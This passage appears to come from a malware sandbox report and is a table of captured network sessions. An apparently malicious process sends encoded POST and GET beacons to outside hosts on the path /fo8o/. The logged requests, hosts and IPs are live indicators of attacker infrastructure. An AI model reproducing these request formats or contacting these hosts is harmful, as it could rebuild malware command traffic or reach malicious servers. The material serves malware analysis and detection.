6f 33 42 6f 33 71 61 4f 58 59 39 5a 47 78 50 6c 33 6c 56 73 2b 4b 52 45 59 4e 57 65 33 41 64 2b 4b 57 42 6b 4e 2b 4d 50 71 59 6d 73 70 54 6b 30 4b 7a 63 75 54 4a 5a 76 6e 66 46 51 67 52 4d 51 69 44 6f 78 67 50 58 5a 44 32 64 6a 48 6c 4b 66 6e 67 30 4c 67 63 5a 47 62 46 77 4d 41 31 79 4c 44 35 38 53 45 4c 64 73 72 65 5a 44 32 4f 43 2b 42 69 59 68 5a 31 76 4a 6e 42 59 68 77 63 79 73 2b 72 4a 44 79 43 64 34 75 64 59 32 6f 49 64 61 74 7a 5a 78 63 36 54 41 45 65 42 74 6d 36 31 6a 51 78 4f 76 39 6c 59 67 4e 66 4d 67 6e 64 32 33 57 54 6a 7a 2f 4d 42 62 50 78 4f 2b 43 4c 35 2f 59 4c 30 72 4d 72 4d 68 64 64 59 4c 4f 71 5a 32 6b 78 57 55 79 44 4a 78 65 63 61 45 67 4f 77 54 77 52 49 4f 43 34 35 35 4f 38 78 72 57 61 6d 42 6f 33 2b 31 30 50 79 65 69 70 59 6f 74 75 56 41 70 48 6c 37 63 5a 72 45 31 47 61 2b 36 36 78 4b 4d 6a 55 4c 30 53 79 78 2b 76 53 4f 4b 67 71 58 6e 2b 6c 75 4b 44 63 49 75 66 56 33 70 41 69 79 35 35 79 72 73 6a 63 4f 47 51 41 55 62 2b 77 3d Data Ascii: OVFPBtpp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKSf/r60SaIqs9YvCKa445o3DvIb9TrShz+H+33Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuuCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adY6OJWb476q0Q+bmb0hnKbf3THxmaenEfiuVQsu72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQcK9lYv/+N+PrZONYNpoKQ3sl0IXC/6zU+xq1fwgr8JNRREYVA3EdubrLvbVAmdhN31HB/ss4RWFPyLbsWJLUzEnXPe1lGGaAWFmFlU93uOS1kDu3bF4b2qDR6/B3Emt03agN9gQR47Gjngmx75oDUvuHJdMx3unliDVtUUuUx+T6ZwkQ83ttmL+LkzJB/gRXNcZCRbkYzd4sgtFhmt0zW8zVzt2k4nTaUmpijYjt9X7jQoTlV3MLEXOnroC6lSo2/Pk9bxAdDpyI2r9pwtLn0gP/gQMCXUrX/8fUAD0rc2PuXcYVXQWoUr8OiRYVlzSKzFUMRP/iM/KEOh23lyLwgNyNEVUwpkBu7eOTCESBnhlnkmxEj/lwX3ZCt2+MyRQYVaqS9ZRRbWGVxfe61Y/LPQWm4ZdZKNR4ANzg7yMXVo3Bo3qaOXY9ZGxPl3lVs+KREYNWe3Ad+KWBkN+MPqYmspTk0KzcuTJZvnfFQgRMQiDoxgPXZD2djHlKfng0LgcZGbFwMA1yLD58SELdsreZD2OC+BiYhZ1vJnBYhwcys+rJDyCd4udY2oIdatzZxc6TAEeBtm61jQxOv9lYgNfMgnd23WTjz/MBbPxO+CL5/YL0rMrMhddYLOqZ2kxWUyDJxecaEgOwTwRIOC455O8xrWamBo3+10PyeipYotuVApHl7cZrE1Ga+66xKMjUL0Syx+vSOKgqXn+luKDcIufV3pAiy55yrsjcOGQAUb+w=
Apr 26, 2024 10:08:52.364010096 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:52 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	49738	195.110.124.133	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:54.897069931 CEST	514	OUT	GET /fo8o/?OVFPBtpp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:08:55.150346041 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:55 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	49739	23.227.38.74	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:00.637531042 CEST	786	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 6f 4a 34 35 39 30 33 37 6f 38 6c 6b 58 59 48 39 64 56 31 78 4a 2f 45 74 4a 64 78 68 Data Ascii: OVFPBtpp=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDoJ459037o8lkXYH9dV1xJ/EtJdxh
Apr 26, 2024 10:09:00.819817066 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:09:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 Vary: Accept-Encoding x-frame-options: DENY x-request-id: 15e5395e-3d66-4581-b044-b646659ada2c-1714118940 server-timing: processing;dur=9 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15e5395e-3d66-4581-b044-b646659ada2c-1714118940 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15e5395e-3d66-4581-b044-b646659ada2c-1714118940 x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtXFLi0seRduO9M09Pycy5P3cnsxIqMxSSK%2BdoS4yyWR7J9%2FoR%2B3wtqTjEphu%2BXGDf8mLaFtpli7%2FSuCOxkZk43TKvc2wnhfendgRTw0ICMqz%2FW3V2wp1%2BcsJ25qBk9uKlHWIPy7PNep"}],"group":"cf-nel", Data Raw: Data Ascii:
Apr 26, 2024 10:09:00.820316076 CEST	218	IN	Data Raw: 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 Data Ascii: max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=58.000088Server: cloudflareCF-RAY: 87a516935fbe498c-MIAalt-svc: h3=":443"; ma=86400
Apr 26, 2024 10:09:00.820324898 CEST	1289	IN	Data Raw: 39 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a 7f 73 db b6 19 fe 3f 9f 02 a6 d2 c6 ea 89 22 29 8a 12 25 4b ca 25 b6 d3 b5 dd 6e dd 92 2e d7 b5 bd 1d 48 82 12 63 8a 60 49 ca b2 9a f5 bb ef 01 40 52 a4 6c 25 4a 96 ac 3b 27 67 12 04 5e bc bf df Data Ascii: 994Zs?")%K%n.Hc`I@Rl%J;'g^<;_RFV:^<OQH\|sM,L\| ~L\|%\i$rDXD/." =RJ:B:FYAYETlq1Z0Bre>#Gr0 /Y&q
Apr 26, 2024 10:09:00.820333004 CEST	1170	IN	Data Raw: 6e 7b 6a 1c 7e 8d 2f 65 6e 20 60 59 fc eb db a0 74 90 19 3e 92 4c 23 2b 7c 24 05 d8 ad c8 68 82 fe 4e b8 bb 88 56 c1 60 4e 18 cd 99 1e 25 3a df 14 c4 cc 6b c9 4f 9a 2b 64 3b 69 62 9d 6c 65 60 08 bf d9 e4 53 1b b9 a0 54 cf e1 70 19 41 8d 89 65 55 Data Ascii: n{j~/en `Yt>L#+\|$hNV`N%:kO+d;ible`STpAeUccdh)d;N&'t` B{?$l!/$O&s4$OpUj83ql{Pfw\rpr8{m^_sM(UzN3dFs=t/_N\
Apr 26, 2024 10:09:00.820338964 CEST	485	IN	Data Raw: 31 64 39 0d 0a 5d 5b 9d e2 ee 45 dc 99 08 1b c9 cc d5 da e3 04 2b 95 28 bc ba 02 11 65 c2 78 03 df 54 a3 1a 81 43 a1 bc 68 83 1f af 37 e1 ea ea d5 eb 5b e7 eb 6c 68 bb bf fe f8 6d fe f2 9f d7 af ff 74 bb fe cb df 96 f4 bb 17 ff f8 fe bb 7c f4 ed Data Ascii: 1d9][E+(exTCh7[lhmt\|6pH!4GB2*XGS&~%[>U7r6'Oo4'/,@+p6'}49i3}"4U>,y~7D2J=_<h8Pp"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	49740	23.227.38.74	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:03.296176910 CEST	810	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 45 4b 4f 36 34 4a 59 77 6f 47 79 53 76 57 78 6e 46 6f 39 48 4c 79 72 32 31 33 45 51 3d 3d Data Ascii: OVFPBtpp=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoEKO64JYwoGySvWxnFo9HLyr213EQ==
Apr 26, 2024 10:09:03.477520943 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:09:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 Vary: Accept-Encoding x-frame-options: DENY x-request-id: 2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943 server-timing: processing;dur=10 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943 x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59VEu%2BZzChuExk3ntbg%2BZZQJmj3sDro2l2wmeu5VJOzVY09u%2FUMh9fkslT%2F3cFFxeT1mdI6mdze%2BURssZatpXEyeKLHY8SVg7Ff98GW2ustNUOX8LrqXQnrmt6LFKb6BJAOqQhod02c4"}],"group":"cf-nel","ma Data Raw: Data Ascii:
Apr 26, 2024 10:09:03.477555037 CEST	215	IN	Data Raw: 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 Data Ascii: _age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=55.999756Server: cloudflareCF-RAY: 87a516a3fadcb3ce-MIAalt-svc: h3=":443"; ma=86400
Apr 26, 2024 10:09:03.477615118 CEST	1289	IN	Data Raw: 62 36 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a fd 93 9b c6 19 fe dd 7f c5 1e 4a e2 53 2a 04 08 21 21 9d a4 8c ef c3 1d 4f 3a d3 b4 4e 9a 69 3e a6 b3 c0 22 71 87 58 02 e8 74 b2 eb ff bd cf ee 02 02 dd c9 96 5d a7 e9 9c 3d 07 cb ee bb ef f7 fb Data Ascii: b6aZJS!!O:Ni>"qXt]=7;_RFV:^<QH!_d&>?y>$b# bik,0gQ#8qO%)@+F3BfkVPhbK"b-z2Gr0 Y&q
Apr 26, 2024 10:09:03.477760077 CEST	1289	IN	Data Raw: 9e 1a 87 5f e3 4b 99 1b 08 58 16 ff fa 36 28 1d 64 86 4f 24 d3 c8 0a 9f 48 01 76 2b 32 9a a0 bf 13 ee 2e a2 55 30 98 13 46 73 a6 47 89 ce 37 05 31 f3 5a f2 93 e6 0a d9 4e 9a 58 27 5b 19 18 c2 6f 36 f9 d4 46 2e 28 d5 73 38 5c 46 50 63 62 59 95 ea Data Ascii: _KX6(dO$Hv+2.U0FsG71ZNX'[o6F.(s8\FPcbYjm=7i#:Sk!i99$`41)]BR}rOIIIIDwBH>'9'SxT5z=(@3;{e9Uex\91o.9CSjC=M2BCcZi>N'.li
Apr 26, 2024 10:09:03.477781057 CEST	351	IN	Data Raw: e0 f6 f1 bc fa 46 ce e6 e4 b9 bf 62 fe 1d 60 94 66 e3 f0 9c 7c f5 d5 9e b8 98 05 08 bc 35 a1 5b f7 59 15 61 c5 11 ae d8 e6 c4 f8 a5 7f 5e 5e f5 74 7f 11 19 fb 0b e3 62 9f 36 aa 05 4d 4e fa 6b 5a f8 ab f3 8c 75 9f 22 ac 48 af 77 25 4d 55 a9 b1 0f Data Ascii: Fb`f\|5[Ya^^tb6MNkZu"Hw%MUK\|1Y&@Nq]"HP#5}\|qugnEv+'8${Vg;?)FW<?m?)#,<RNPW:AWUmFn_\mqD=puH
Apr 26, 2024 10:09:03.477816105 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	49741	23.227.38.74	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:05.947901011 CEST	1823	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 52 51 43 66 4b 4b 50 48 77 58 4a 62 49 32 5a 5a 45 39 66 57 30 56 38 6a 75 30 70 6e 4d 50 39 58 75 6d 39 43 67 54 47 4e 4e 75 6f 68 35 5a 72 32 55 66 58 41 63 4b 64 48 72 6a 47 36 33 38 2b 63 65 2b 4b 6f 46 79 78 6f 47 72 72 36 67 54 4f 31 47 48 68 32 74 6b 6a 56 71 30 44 51 30 59 68 65 75 55 33 4e 34 6e 61 6d 53 70 6c 57 77 6e 59 76 4d 53 6e 48 54 30 45 64 4b 44 7a 65 4d 44 4b 42 42 59 4f 4b 35 34 43 65 72 78 39 37 49 4e 4c 76 59 37 37 52 4d 50 6b 4d 38 61 34 4e 71 49 66 4a 2b 4c 55 62 50 64 61 6e 35 79 36 6e 6d 56 67 32 54 31 35 4f 34 36 53 53 69 49 43 6e 6e 39 73 50 64 72 43 6c 6b 79 53 78 50 67 39 30 2b 36 36 73 78 6e 37 65 6c 30 61 32 6a 5a 75 76 69 31 70 64 6a 4f 51 73 71 67 49 69 57 70 72 6b 42 4a 6c 68 45 5a 6a 39 68 50 32 79 41 42 42 70 46 57 52 79 64 52 31 34 42 7a 73 4b 57 47 44 54 62 49 34 78 47 2b 2b 43 4a 72 43 65 76 58 36 2b 35 42 2f 72 31 45 59 6a 64 73 6a 4f 70 2b 44 50 6d 4f 64 6b 31 59 48 64 47 43 69 56 6e 63 4a 55 4c 57 33 4e 47 72 75 62 45 5a 39 39 54 4e 5a 63 41 69 42 34 77 57 30 59 2b 53 69 70 42 56 2b 78 54 67 45 2b 4d 47 73 75 78 49 35 61 51 4e 59 32 44 39 73 49 2b 57 34 6f 33 2f 52 6b 74 49 4c 61 76 46 7a 33 37 51 56 72 30 49 48 50 66 73 67 6e 43 6f 79 76 62 58 31 55 32 74 45 35 72 42 31 38 67 58 79 75 72 57 65 58 38 49 4f 69 67 2f 70 57 32 6d 48 31 51 6b 78 41 31 55 4b 6e 63 36 51 7a 58 37 39 6f 6d 51 7a 65 4a 54 33 76 59 6c 36 69 6b 71 50 41 76 70 61 70 47 76 2b 62 52 72 33 6d 79 65 75 36 37 70 6e 43 38 77 53 2b 4a 57 47 56 76 72 37 31 57 66 49 38 44 59 56 44 44 77 4e 34 52 38 66 35 6f 53 41 54 39 46 78 35 69 4c 37 72 4e 31 50 37 38 59 35 62 32 51 5a 73 54 70 30 56 51 35 6e 38 76 73 45 30 76 41 62 6c 52 65 45 36 5a 4a 6e 45 4d 48 45 38 39 50 35 69 45 35 53 6c 4c 6d 62 6e 51 48 6b 71 35 31 39 6f 43 69 76 65 56 62 73 50 73 37 42 65 67 43 41 48 63 33 6d 36 44 4e 54 4a 47 79 43 78 4e 63 62 75 76 4b 45 78 4e 55 50 66 7a 52 59 67 58 6a 65 34 45 63 35 63 4b 6e 39 35 62 76 4e 65 44 41 62 59 63 70 55 6d 4e 6d 57 72 51 72 7a 4d 4b 5a 63 72 48 49 72 38 58 38 6e 4e 6f 6c 49 6e 36 54 6c 65 4f 79 4b 47 69 70 69 78 63 47 4d 71 71 73 4e 33 62 6c 4c 66 4a 69 46 51 45 36 66 66 5a 4f 54 6f 69 67 74 67 75 4c 35 4c 4f 51 75 5a 39 57 63 4e 49 4a 6f 6c 39 54 74 63 4b 71 70 48 65 62 37 61 61 77 6c 5a 44 6a 61 39 44 68 73 77 2b 4d 6a 31 65 6c 39 6b 42 73 46 49 31 50 71 6e 6d 43 2f 52 6a 4c 6c 5a 45 65 52 43 65 57 67 64 64 2f 52 4b 41 49 75 46 71 37 41 53 46 52 47 59 4c 57 62 45 34 52 42 58 61 47 6e 68 34 66 66 61 77 4a 51 65 39 64 4a 57 44 6a 2f 68 41 49 65 2f 2b 71 6e 71 48 78 64 57 6d 59 57 67 48 6e 48 61 4c 50 73 65 4d 30 68 59 61 74 54 47 4c 69 6d 42 69 53 75 4e 31 53 47 35 49 32 55 66 56 34 5a 37 67 65 79 64 30 54 72 36 59 6c 6c 6e 31 52 5a 48 2f 58 46 7a 65 38 6a 75 6e 54 50 43 50 78 4e 64 45 30 5a 4b 6c 38 68 71 79 2f 4f 69 74 30 71 50 48 6c 57 59 67 35 66 34 61 48 4f 35 63 6f 78 68 37 79 43 63 62 72 43 30 74 69 58 77 58 76 7a 6a 34 67 46 79 6f 6a 73 37 48 4c 44 69 69 67 5a 6f 62 38 57 64 36 73 49 49 49 69 73 54 6b 68 48 66 73 41 50 70 75 69 54 4d 4e 42 32 75 77 58 72 43 6c 78 50 6c 30 46 68 53 2b 66 55 63 63 68 51 6e 6c 55 2b 4a 52 74 41 57 4b 34 4e 33 30 6f 63 6e 51 79 38 70 4f 45 37 56 30 3d Data Ascii: OVFPBtpp=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/RQCfKKPHwXJbI2ZZE9fW0V8ju0pnMP9Xum9CgTGNNuoh5Zr2UfXAcKdHrjG638+ce+KoFyxoGrr6gTO1GHh2tkjVq0DQ0YheuU3N4namSplWwnYvMSnHT0EdKDzeMDKBBYOK54Cerx97INLvY77RMPkM8a4NqIfJ+LUbPdan5y6nmVg2T15O46SSiICnn9sPdrClkySxPg90+66sxn7el0a2jZuvi1pdjOQsqgIiWprkBJlhEZj9hP2yABBpFWRydR14BzsKWGDTbI4xG++CJrCevX6+5B/r1EYjdsjOp+DPmOdk1YHdGCiVncJULW3NGrubEZ99TNZcAiB4wW0Y+SipBV+xTgE+MGsuxI5aQNY2D9sI+W4o3/RktILavFz37QVr0IHPfsgnCoyvbX1U2tE5rB18gXyurWeX8IOig/pW2mH1QkxA1UKnc6QzX79omQzeJT3vYl6ikqPAvpapGv+bRr3myeu67pnC8wS+JWGVvr71WfI8DYVDDwN4R8f5oSAT9Fx5iL7rN1P78Y5b2QZsTp0VQ5n8vsE0vAblReE6ZJnEMHE89P5iE5SlLmbnQHkq519oCiveVbsPs7BegCAHc3m6DNTJGyCxNcbuvKExNUPfzRYgXje4Ec5cKn95bvNeDAbYcpUmNmWrQrzMKZcrHIr8X8nNolIn6TleOyKGipixcGMqqsN3blLfJiFQE6ffZOToigtguL5LOQuZ9WcNIJol9TtcKqpHeb7aawlZDja9Dhsw+Mj1el9kBsFI1PqnmC/RjLlZEeRCeWgdd/RKAIuFq7ASFRGYLWbE4RBXaGnh4ffawJQe9dJWDj/hAIe/+qnqHxdWmYWgHnHaLPseM0hYatTGLimBiSuN1SG5I2UfV4Z7geyd0Tr6Ylln1RZH/XFze8junTPCPxNdE0ZKl8hqy/Oit0qPHlWYg5f4aHO5coxh7yCcbrC0tiXw